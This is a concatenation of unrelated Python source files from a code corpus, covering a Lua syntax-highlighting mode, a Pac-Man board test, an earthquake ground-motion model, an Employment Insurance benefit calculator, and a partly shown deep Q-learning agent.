def lua_rule5(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="[[", end="]]",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def lua_rule6(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="+",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule7(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="-",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule8(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule9(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule10(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="^",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule11(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="..",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule12(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule13(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule14(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule15(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule16(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="==",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule17(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="~=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule18(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def lua_rule19(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="(",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule20(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="{",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule21(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule22(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=True)
def lua_rule23(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for lua_main ruleset.
rulesDict1 = {
"\"": [lua_rule3,lua_rule21,],
"#": [lua_rule2,],
"'": [lua_rule4,lua_rule22,],
"(": [lua_rule19,],
"*": [lua_rule8,],
"+": [lua_rule6,],
"-": [lua_rule0,lua_rule1,lua_rule7,],
".": [lua_rule11,lua_rule23,],
"/": [lua_rule9,],
"0": [lua_rule23,],
"1": [lua_rule23,],
"2": [lua_rule23,],
"3": [lua_rule23,],
"4": [lua_rule23,],
"5": [lua_rule23,],
"6": [lua_rule23,],
"7": [lua_rule23,],
"8": [lua_rule23,],
"9": [lua_rule23,],
"<": [lua_rule12,lua_rule13,],
"=": [lua_rule16,lua_rule18,],
">": [lua_rule14,lua_rule15,],
"@": [lua_rule23,],
"A": [lua_rule23,],
"B": [lua_rule23,],
"C": [lua_rule23,],
"D": [lua_rule23,],
"E": [lua_rule23,],
"F": [lua_rule23,],
"G": [lua_rule23,],
"H": [lua_rule23,],
"I": [lua_rule23,],
"J": [lua_rule23,],
"K": [lua_rule23,],
"L": [lua_rule23,],
"M": [lua_rule23,],
"N": [lua_rule23,],
"O": [lua_rule23,],
"P": [lua_rule23,],
"Q": [lua_rule23,],
"R": [lua_rule23,],
"S": [lua_rule23,],
"T": [lua_rule23,],
"U": [lua_rule23,],
"V": [lua_rule23,],
"W": [lua_rule23,],
"X": [lua_rule23,],
"Y": [lua_rule23,],
"Z": [lua_rule23,],
"[": [lua_rule5,],
"^": [lua_rule10,],
"_": [lua_rule23,],
"a": [lua_rule23,],
"b": [lua_rule23,],
"c": [lua_rule23,],
"d": [lua_rule23,],
"e": [lua_rule23,],
"f": [lua_rule23,],
"g": [lua_rule23,],
"h": [lua_rule23,],
"i": [lua_rule23,],
"j": [lua_rule23,],
"k": [lua_rule23,],
"l": [lua_rule23,],
"m": [lua_rule23,],
"n": [lua_rule23,],
"o": [lua_rule23,],
"p": [lua_rule23,],
"q": [lua_rule23,],
"r": [lua_rule23,],
"s": [lua_rule23,],
"t": [lua_rule23,],
"u": [lua_rule23,],
"v": [lua_rule23,],
"w": [lua_rule23,],
"x": [lua_rule23,],
"y": [lua_rule23,],
"z": [lua_rule23,],
"{": [lua_rule20,],
"~": [lua_rule17,],
}
# x.rulesDictDict for lua mode.
rulesDictDict = {
"lua_main": rulesDict1,
}
# Import dict for lua mode.
importDict = {}
| 1.554688 | 2 |
test1/noding/noding.py | gr0mph/SpringChallenge2020 | 0 | 12786519 | import sys
sys.path.append('../../')
# Global variables
from test1.test_map import PACMAN_MAP
from test1.test_map import WIDTH
from test1.test_map import HEIGHT
# Class
from Challenge import Case
from Challenge import Node
from Challenge import Edge
from Challenge import BoardNodesAndEdges
# Global
# Method
from Challenge import t_update_width_and_height
import unittest
t_update_width_and_height(WIDTH, HEIGHT)
class _noding(unittest.TestCase):
def test_node(self):
kanban_node = BoardNodesAndEdges(None)
kanban_node.set_up(PACMAN_MAP)
# OK
for k_coord, n1 in kanban_node.nodes.items():
y1, x1 = k_coord
print(f'(x {x1} y {y1}) n {n1}')
print()
for e1 in kanban_node.edges:
k1_coord, k2_coord = e1.allays[0], e1.allays[-1]
y1, x1 = k1_coord.coord
y2, x2 = k2_coord.coord
print(f'(x {x1} y {y1}) (x {x2} y {y2})')
print(f'e {e1}')
print()
return
if __name__ == '__main__':
unittest.main()
| 2.484375 | 2 |
pygmm/akkar_sandikkaya_bommer_2014.py | nassermarafi/pygmm | 0 | 12786520 | <gh_stars>0
#!/usr/bin/env python3
# encoding: utf-8
from __future__ import division
import collections
import numpy as np
from . import model
__author__ = '<NAME>'
class AkkarSandikkayaBommer2014(model.Model):
"""Akkar, Sandikkaya, & Bommer (2014, :cite:`akkar14`) model.
"""
NAME = '<NAME>, & Bommer (2014)'
ABBREV = 'ASB13'
# Reference velocity (m/sec)
V_REF = 750.
# Load the coefficients for the model
COEFF = collections.OrderedDict(
(k, model.load_data_file(
'akkar-sandikkaya-bommer-2014-%s.csv' % k, 2))
for k in ['dist_jb', 'dist_hyp', 'dist_epi']
)
PERIODS = np.array(COEFF['dist_jb'].period)
INDICES_PSA = np.arange(2, 64)
INDEX_PGA = 0
INDEX_PGV = 1
PARAMS = [
model.NumericParameter('dist_jb', False, 0, 200),
model.NumericParameter('dist_epi', False, 0, 200),
model.NumericParameter('dist_hyp', False, 0, 200),
model.NumericParameter('mag', True, 4, 8),
model.NumericParameter('v_s30', True, 150, 1200),
model.CategoricalParameter('mechanism', True, ['SS', 'NS', 'RS']),
]
def __init__(self, **kwds):
"""Initialize the model.
The model is specified for three different distance metrics. However,
the implementation uses only one distance metric. They are used in
the following order:
1. `dist_jb`
2. `dist_hyp`
3. `dist_epi`
This order was selected based on evaluation of the total standard
deviation. To compute the response for differing metrics, call the
model multiple times with different keywords.
Keyword Args:
dist_jb (float): Joyner-Boore distance to the rupture plane
(:math:`R_\\text{JB}`, km)
dist_epi (float): Epicentral distance to the rupture plane
(:math:`R_\\text{epi}`, km)
dist_hyp (float): Hypocentral distance to the rupture plane
(:math:`R_\\text{hyp}`, km).
mag (float): moment magnitude of the event (:math:`M_w`)
mechanism (str): fault mechanism. Valid options: "SS", "NS", "RS".
v_s30 (float): time-averaged shear-wave velocity over the top 30 m
of the site (:math:`V_{s30}`, m/s).
"""
super(AkkarSandikkayaBommer2014, self).__init__(**kwds)
p = self.params
for k in self.COEFF:
if p[k] is not None:
dist = p[k]
c = self.COEFF[k]
break
else:
raise NotImplementedError("Must provide at least one distance "
"metric.")
# Compute the reference response
ln_resp_ref = (
c.a_1 + c.a_3 * (8.5 - p['mag']) ** 2 +
(c.a_4 + c.a_5 * (p['mag'] - c.c_1)) *
np.log(np.sqrt(dist ** 2 + c.a_6 ** 2))
)
mask = (p['mag'] <= c.c_1)
ln_resp_ref[mask] += (c.a_2 * (p['mag'] - c.c_1))[mask]
ln_resp_ref[~mask] += (c.a_7 * (p['mag'] - c.c_1))[~mask]
if p['mechanism'] == 'NS':
ln_resp_ref += c.a_8
elif p['mechanism'] == 'RS':
ln_resp_ref += c.a_9
pga_ref = np.exp(ln_resp_ref[self.INDEX_PGA])
# Compute the nonlinear site term
if p['v_s30'] <= self.V_REF:
vs_ratio = p['v_s30'] / self.V_REF
site = (c.b_1 * np.log(vs_ratio) +
c.b_2 * np.log((pga_ref + c.c * vs_ratio ** c.n) /
((pga_ref + c.c) * vs_ratio ** c.n))
)
else:
site = c.b_1 * np.log(np.minimum(p['v_s30'], c.v_con) / self.V_REF)
self._ln_resp = ln_resp_ref + site
self._ln_std = np.array(c.sd_total)
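# Illustrative usage sketch (added for clarity; the scenario values are made up):
# the model is constructed with the keyword arguments listed in PARAMS, and this
# __init__ stores the computed log-response and log-standard-deviation on the
# instance; public accessors come from the model.Model base class (not shown here).
#
#     m = AkkarSandikkayaBommer2014(dist_jb=10., mag=6.5, v_s30=450., mechanism='SS')
#     ln_sa = m._ln_resp    # natural-log response at self.PERIODS (PGA, PGV, PSA)
#     ln_std = m._ln_std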
| 2.46875 | 2 |
srd/ei/programs.py | RogerEMO/srd | 1 | 12786521 | <filename>srd/ei/programs.py
from srd import add_params_as_attr
import os
from srd.ei import template
module_dir = os.path.dirname(os.path.dirname(__file__))
# wrapper to pick correct year
def program(year):
"""
    Selects the program version for a given year.
    Parameters
    ----------
    year: int
        year (currently between 2016 and 2020)
    Returns
    -------
    class instance
        An instance of the class for the selected year.
"""
if year == 2016:
p = program_2016()
if year == 2017:
p = program_2017()
if year == 2018:
p = program_2018()
if year == 2019:
p = program_2019()
if year == 2020:
p = program_2020()
return p
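# Illustrative usage sketch (added for clarity, not part of the original module):
#
#     p = program(2018)   # returns a program_2018 instance with that year's parameters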
# program for 2016, derived from template, only requires modifying
# functions that change
class program_2016(template):
"""
    2016 version of the program.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2016.csv')
# program for 2017, derived from template, only requires modifying
# functions that change
class program_2017(template):
"""
    2017 version of the program.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2017.csv')
# program for 2018, derived from template, only requires modifying
# functions that change
class program_2018(template):
"""
    2018 version of the program.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2018.csv')
# program for 2019, derived from template, only requires modifying
# functions that change
class program_2019(template):
"""
    2019 version of the program.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2019.csv')
# program for 2020, derived from template, only requires modifying
# functions that change
class program_2020(template):
"""
    2020 version of the program.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2020.csv')
def compute_benefits_covid(self, p, hh):
"""
        Computes the Employment Insurance benefits that would replace
        the CERB (counterfactual scenario).
        Parameters
        ----------
        p: Person
            instance of the Person class
        hh: Hhold
            instance of the Hhold class
        Returns
        -------
        float
            benefit amount
"""
months_ei = max(p.months_cerb, p.months_cesb)
if months_ei == 0 or p.prev_inc_work < self.min_inc_work:
return
else:
inc_work_ei = min(self.max_earn_EI, p.prev_inc_work) / self.months_per_year
for month in range(self.begin_april, self.begin_april + months_ei):
if p.hours_month is None or p.hours_month[month] < self.max_hours_month:
clawback = self.claw_rate_low * p.inc_work_month[month]
add_amount = max(0, p.inc_work_month[month]
- self.perc_cutoff_high * inc_work_ei)
clawback += self.claw_rate_high * add_amount
p.inc_ei += max(0, self.rate_benefits * inc_work_ei - clawback)
| 2.65625 | 3 |
Code/BehaviouralModels/DRL.py | Gronne/Individual-Optimization-Based-on-Group-Information-Sharing | 0 | 12786522 | <reponame>Gronne/Individual-Optimization-Based-on-Group-Information-Sharing
import random
import numpy as np
import math
from collections import deque
import time
import os
from tensorflow.keras import models
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras import callbacks
import tensorflow
from Simulations.GameFeatures import GameFeatures as GF
from BehaviouralModels.BehaviouralModels import BehaviouralModelInterface
MODEL_NAME = "IndiDQR_1024x2"
MIN_REPLAY_MEMORY_SIZE = 2048
MAX_REPLAY_MEMORY_SIZE = 50_000
MINIBATCH_SIZE = 2048 #Affects how many states are used per fit
DISCOUNT = 0.99
UPDATE_TARGET_EVERY = 16
MAP_HEIGHT = 14
MAP_WIDTH = 14
class CustomCallback(callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
return
print("Loss: {:7.2f}".format(logs["loss"]))
print("Accuracy: {:7.2f}".format(logs["accuracy"]))
class IndiDRL(BehaviouralModelInterface):
def __init__(self, goals, initial_game_state, feasible_actions, model_addr, results_addr):
super().__init__(goals, initial_game_state, feasible_actions, results_addr)
self._model_addr = model_addr
self._create_directory(self._model_addr)
self._create_model_directory(self._model_addr)
self._mode = None
self._previous_state = None
self._previous_prediction = None
self._previous_score = 0
self._previous_action = None
self._turn_count = 0
if self._get_file_size(self._model_addr + ".txt"):
#Load
self._main_model, self._current_model, self._epsilon = self._load_model()
else:
#Create
#Main model - Get trained every step
self._main_model = self._build_model_conv(initial_game_state, feasible_actions)
#Target model - This is what we predict against every step
self._current_model = self._build_model_conv(initial_game_state, feasible_actions)
self._current_model.set_weights(self._main_model.get_weights())
#Set epsilon
self._epsilon = 1
self._epsilon_decay = 0.99925 #0.99975 before
self._episodes = 6000
self._episode_epsilon = self._epsilon_decay**self._episodes
if self._epsilon < self._episode_epsilon:
self._epsilon = 0
self._target_update_counter = 0
#Ensures that multiple steps can be fitted at once, so it does not overfit to a single one
self._replay_memory = deque(maxlen=MAX_REPLAY_MEMORY_SIZE)
def _create_model_directory(self, addr):
try:
main_dir = addr + "_main_model/"
current_dir = addr + "_current_model/"
os.makedirs(main_dir)
os.makedirs(current_dir)
except FileExistsError:
pass
def get_epsilon(self):
return self._epsilon
def _load_model(self):
print("#####LOAD MODEL#####")
main_model = models.load_model(self._model_addr + "_main_model")
current_model = models.load_model(self._model_addr + "_current_model")
epsilon = None
with open(self._model_addr + ".txt") as model_file:
for line in model_file:
epsilon = float(line)
return main_model, current_model, epsilon
def save_model(self):
self._main_model.save(self._model_addr + "_main_model")
self._current_model.save(self._model_addr + "_current_model")
with open(self._model_addr + ".txt", "w") as file:
file.write(str(self._epsilon))
def _build_model(self, game_state, feasible_actions):
first_layer_size = (len(game_state)) + len(game_state[-1])*3*3 #3 colors in our layers at X pixels + extra info
#Should probably use cnn...
model = models.Sequential()
model.add(tensorflow.keras.Input(shape=(first_layer_size,), name="digits")) #Input layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(len(feasible_actions), activation='linear')) #Output layer
opt = optimizers.Adam(learning_rate=0.0001, decay=1e-6)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
return model
def _build_model_conv(self, game_state, feasible_actions):
inputA = tensorflow.keras.Input(shape=((len(game_state)-2),)) #User info
inputB_1 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - first layer
inputB_2 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - second layer
inputB_3 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - third layer
#-------- InputB_1 --------
#branchB_1 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
#branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
#branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Flatten()(branchB_1)
modelB_1 = models.Model(inputs=inputB_1, outputs=branchB_1)
#-------- InputB_2 --------
#branchB_2 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
#branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
#branchB_2 = layers.Dropout(0.2)(branchB_2)
branchB_2 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
branchB_2 = layers.Dropout(0.2)(branchB_2)
branchB_2 = layers.Flatten()(branchB_2)
modelB_2 = models.Model(inputs=inputB_2, outputs=branchB_2)
#-------- InputB_3 --------
#branchB_3 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
#branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
#branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Flatten()(branchB_3)
modelB_3 = models.Model(inputs=inputB_3, outputs=branchB_3)
#------- Combine -------
branchC = layers.concatenate([inputA, modelB_1.output, modelB_2.output, modelB_3.output])
branchC = layers.Dense(256, activation='relu')(branchC)
branchC = layers.Dense(256, activation='relu')(branchC)
output = layers.Dense(len(feasible_actions), activation='linear')(branchC) #Output layer
model = models.Model(inputs=[inputA, modelB_1.input, modelB_2.input, modelB_3.input], outputs = output)
opt = optimizers.Adam(learning_rate=1e-3)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
#tensorflow.keras.utils.plot_model(model, "multi_input_and_output_model.png", show_shapes=True)
return model
def _custom_loss_function(self, score_true, score_expected):
custom_loss = []
for index, _ in enumerate(score_true):
custom_loss += [math.sqrt((score_true[index]-score_expected[index])**2)]
return np.asarray([custom_loss])
def _update_replay_memory(self, transition):
self._replay_memory.append(transition)
def _get_qs(self, state, step): #Probably not gonna be used
current_state = self._game_to_model_state(state)
prediction = self._main_model.predict(current_state)[0]
return prediction
def _train(self, terminal_state, step):
if len(self._replay_memory) < MIN_REPLAY_MEMORY_SIZE or self._turn_count % 1000 != 0:
return
minibatch = random.sample(self._replay_memory, MINIBATCH_SIZE)
current_state = self._get_current_state(minibatch)
current_qs_list = self._main_model.predict(current_state)
future_state = self._get_future_state(minibatch)
future_qs_list = self._current_model.predict(future_state)
X_info = []
X_l1 = []
X_l2 = []
X_l3 = []
y = []
for index, (current_state, action, reward, new_current_state, done, life_changer) in enumerate(minibatch):
if done:
new_q = -10 #reward
elif life_changer:
new_q = reward
else:
max_future_q = np.max(future_qs_list[index])
                new_q = reward + DISCOUNT * max_future_q #The discount down-weights the estimated future return relative to the immediate reward
current_qs = current_qs_list[index]
current_qs[action] = new_q
self._append_to_input_output_matrices(X_info, X_l1, X_l2, X_l3, y, current_state, current_qs)
X_info_np = self._transform_info_to_np_structure(X_info)
X_l1_np = self._transform_X_to_np_structure(X_l1)
X_l2_np = self._transform_X_to_np_structure(X_l2)
X_l3_np = self._transform_X_to_np_structure(X_l3)
        history = self._main_model.fit([X_info_np, X_l1_np, X_l2_np, X_l3_np], np.array(y), batch_size = MINIBATCH_SIZE, verbose = 0, shuffle=False, callbacks=[CustomCallback()] if terminal_state or step%10 == 1 else None) #Only attach the callback on terminal states (or every 10th step)
#Updating to determine if we want to update target_model yet
if terminal_state:
self._target_update_counter += 1
if self._target_update_counter > UPDATE_TARGET_EVERY:
self._target_update_counter = 0
self._current_model.set_weights(self._main_model.get_weights())
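    # Worked example of the target update above (added for clarity; the numbers are
    # made up): with reward = 1.0, DISCOUNT = 0.99 and max_future_q = 2.0, a
    # non-terminal transition gets new_q = 1.0 + 0.99 * 2.0 = 2.98, and that value
    # overwrites current_qs[action] before the network is fit on (state, current_qs).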
def _append_to_input_output_matrices(self, X0, X1, X2, X3, y, state, qs):
X0 += [state[0]] #Previous state
X1 += [state[1]]
X2 += [state[2]]
X3 += [state[3]]
        y += [qs] #The Q-values this state should have led to
def _transform_info_to_np_structure(self, X_info):
X_info_np = np.array(X_info)
X_info_np = X_info_np.reshape(X_info_np.shape[0], X_info_np.shape[2])
return X_info_np
def _transform_X_to_np_structure(self, X):
X_np = np.array(X)
X_np = X_np.reshape(X_np.shape[0], X_np.shape[2], X_np.shape[3], X_np.shape[4])
return X_np
def _get_current_state(self, minibatch):
current_states_0 = np.array([transition[0][0] for transition in minibatch])
current_states_0 = current_states_0.reshape(current_states_0.shape[0], current_states_0.shape[2])
current_states_1 = np.array([transition[0][1] for transition in minibatch])
current_states_1 = current_states_1.reshape(current_states_1.shape[0], current_states_1.shape[2], current_states_1.shape[3], current_states_1.shape[4])
current_states_2 = np.array([transition[0][2] for transition in minibatch])
current_states_2 = current_states_2.reshape(current_states_2.shape[0], current_states_2.shape[2], current_states_2.shape[3], current_states_2.shape[4])
current_states_3 = np.array([transition[0][3] for transition in minibatch])
current_states_3 = current_states_3.reshape(current_states_3.shape[0], current_states_3.shape[2], current_states_3.shape[3], current_states_3.shape[4])
return [current_states_0, current_states_1, current_states_2, current_states_3]
def _get_future_state(self, minibatch):
new_current_state_0 = np.array([transition[3][0] for transition in minibatch])
new_current_state_0 = new_current_state_0.reshape(new_current_state_0.shape[0], new_current_state_0.shape[2])
new_current_state_1 = np.array([transition[3][1] for transition in minibatch])
new_current_state_1 = new_current_state_1.reshape(new_current_state_1.shape[0], new_current_state_1.shape[2], new_current_state_1.shape[3], new_current_state_1.shape[4])
new_current_state_2 = np.array([transition[3][2] for transition in minibatch])
new_current_state_2 = new_current_state_2.reshape(new_current_state_2.shape[0], new_current_state_2.shape[2], new_current_state_2.shape[3], new_current_state_2.shape[4])
new_current_state_3 = np.array([transition[3][3] for transition in minibatch])
new_current_state_3 = new_current_state_3.reshape(new_current_state_3.shape[0], new_current_state_3.shape[2], new_current_state_3.shape[3], new_current_state_3.shape[4])
return [new_current_state_0, new_current_state_1, new_current_state_2, new_current_state_3]
def action(self, game_state, train_flag = True):
self._turn_count += 1
model_state = self._game_to_model_state(game_state)
if train_flag:
            score = self._calculate_score(game_state[0], game_state[2], game_state[3]) - self._previous_score #Reward - use the reward difference, not the absolute score
self._previous_score = self._calculate_score(game_state[0], game_state[2], game_state[3])
if self._epsilon > self._episode_epsilon and self._epsilon != 0:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
if self._turn_count % 500 == 0:
self._epsilon *= self._epsilon_decay
print(f"Epsilon: {self._epsilon}, Name: {self._model_addr}")
if isinstance(self._previous_state, list):
terminal_state = game_state[0] == 0 or model_state[0][0][0] != self._previous_state[0][0][0] or model_state[0][0][1] != self._previous_state[0][0][1] #If dead, different health, or different points
                self._update_replay_memory((self._previous_state, self._previous_action, score, model_state, game_state[0] == 0, terminal_state)) #Previous state, action taken, reward received, the new state it led to, whether the run ended, and whether the step was terminal (death or health/points change)
self._train(terminal_state , game_state[0])
else:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
elif not self._turn_count % 100:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
action = self._calculate_action(model_state, 0 if not train_flag or self._epsilon < self._episode_epsilon else self._epsilon)
return action
def _calculate_action(self, current_state, epsilon):
prediction = self._main_model.predict(current_state)
action_index = self._choose_action_from_prediction(prediction, epsilon)
self._previous_state = current_state
self._previous_prediction = prediction
self._previous_action = action_index
return self._feasible_actions[action_index]
def _game_to_model_state(self, game_state):
steps = game_state[0] #Should this be normalized?
life = game_state[1]/100 #Normalize
points = game_state[2] #Should this be normalized?
player_coor = (game_state[3][0]/len(game_state[-1][0]), game_state[3][1]/len(game_state[-1])) #Normalize
model_state_attr = [life, player_coor[0], player_coor[1]]
image_shape = (len(game_state[-1]), len(game_state[-1][0]), len(game_state[-1][0][0][0]))
np_model_state_attr = np.array(model_state_attr).reshape(-1, len(model_state_attr))
np_map = np.array(game_state[-1])
np_model_state_map = np.array([ np_map[:,:,0].reshape(-1, *image_shape)/255,
np_map[:,:,1].reshape(-1, *image_shape)/255,
np_map[:,:,2].reshape(-1, *image_shape)/255 ])
return [np_model_state_attr, np_model_state_map[0], np_model_state_map[1], np_model_state_map[2]]
def _choose_action_from_prediction(self, prediction, epsilon):
prediction = prediction[0]
#Choose the highest score
index = np.argmax(prediction)
if np.random.random() < epsilon:
index = np.random.randint(0, len(prediction))
return index
class GroupDRL(BehaviouralModelInterface):
_replay_memory = deque(maxlen=MAX_REPLAY_MEMORY_SIZE)
_main_model = None
_current_model = None
_global_instances = 0
_global_target_update_count = 0
_global_training_count = 0
_epsilon = 1
def __init__(self, goals, initial_game_state, feasible_actions, model_addr, results_addr):
super().__init__(goals, initial_game_state, feasible_actions, results_addr)
self._model_addr = model_addr
self._main_model_flag = None
if GroupDRL._main_model == None:
self._create_directory(self._model_addr)
self._create_model_directory(self._model_addr)
self._main_model_flag = True
else:
self._main_model_flag = False
self._mode = None
self._previous_state = None
self._previous_prediction = None
self._previous_score = 0
self._previous_action = None
self._turn_count = 0
if self._get_file_size(self._model_addr + ".txt"):
#Load
if GroupDRL._main_model == None:
GroupDRL._main_model, GroupDRL._current_model, GroupDRL._epsilon = self._load_model()
else:
#Create
if GroupDRL._main_model == None:
#Main model - Get trained every step
GroupDRL._main_model = self._build_model_conv(initial_game_state, feasible_actions)
#Target model - This is what we predict against every step
GroupDRL._current_model = self._build_model_conv(initial_game_state, feasible_actions)
GroupDRL._current_model.set_weights(GroupDRL._main_model.get_weights())
#Set epsilon
GroupDRL._epsilon = 1
self._epsilon_decay = 0.99925 #0.99975 before
self._episodes = 6000
self._episode_epsilon = self._epsilon_decay**self._episodes
if GroupDRL._epsilon < self._episode_epsilon:
GroupDRL._epsilon = 0
GroupDRL._global_target_update_count = 0
GroupDRL._global_instances += 1
#Ensures that multiple steps can be fitted at once, so it does not overfit to a single one
GroupDRL._replay_memory = deque(maxlen=MAX_REPLAY_MEMORY_SIZE)
def _create_model_directory(self, addr):
try:
main_dir = addr + "_main_model/"
current_dir = addr + "_current_model/"
os.makedirs(main_dir)
os.makedirs(current_dir)
except FileExistsError:
pass
def get_epsilon(self):
return GroupDRL._epsilon
def _load_model(self):
print("#####LOAD MODEL#####")
main_model = models.load_model(self._model_addr + "_main_model")
current_model = models.load_model(self._model_addr + "_current_model")
epsilon = None
with open(self._model_addr + ".txt") as model_file:
for line in model_file:
epsilon = float(line)
return main_model, current_model, epsilon
def save_model(self):
if self._main_model_flag == True:
GroupDRL._main_model.save(self._model_addr + "_main_model")
GroupDRL._current_model.save(self._model_addr + "_current_model")
with open(self._model_addr + ".txt", "w") as file:
file.write(str(GroupDRL._epsilon))
def _build_model(self, game_state, feasible_actions):
first_layer_size = (len(game_state)) + len(game_state[-1])*3*3 #3 colors in our layers at X pixels + extra info
#Should probably use cnn...
model = models.Sequential()
model.add(tensorflow.keras.Input(shape=(first_layer_size,), name="digits")) #Input layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(len(feasible_actions), activation='linear')) #Output layer
opt = optimizers.Adam(learning_rate=0.0001, decay=1e-6)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
return model
def _build_model_conv(self, game_state, feasible_actions):
inputA = tensorflow.keras.Input(shape=((len(game_state)-2),)) #User info
inputB_1 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - first layer
inputB_2 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - second layer
inputB_3 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - third layer
#-------- InputB_1 --------
#branchB_1 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
#branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
#branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Flatten()(branchB_1)
modelB_1 = models.Model(inputs=inputB_1, outputs=branchB_1)
#-------- InputB_2 --------
#branchB_2 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
#branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
#branchB_2 = layers.Dropout(0.2)(branchB_2)
